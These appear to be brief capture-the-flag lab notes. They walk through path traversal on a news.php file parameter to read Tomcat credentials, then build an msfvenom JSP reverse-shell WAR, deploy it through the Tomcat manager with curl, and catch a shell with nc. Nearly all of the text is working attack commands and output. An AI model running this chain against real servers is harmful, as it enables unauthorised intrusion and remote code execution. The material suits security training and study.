view-source:http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.161 LPORT=6969 -f war -o shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes
Saved as: shell.war
As password has special chars, finding docs for tomcat9 manager cli
https://tomcat.apache.org/tomcat-9.0-doc/host-manager-howto.html
$ curl -u tomcat:'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:2:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
$ curl -u tomcat:'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/kashz --upload-file rev.war
OK - Deployed application at context path [/kashz]
$ curl http://10.10.10.194:8080/kashz
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.194] 59472
whoami;id
tomcat
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)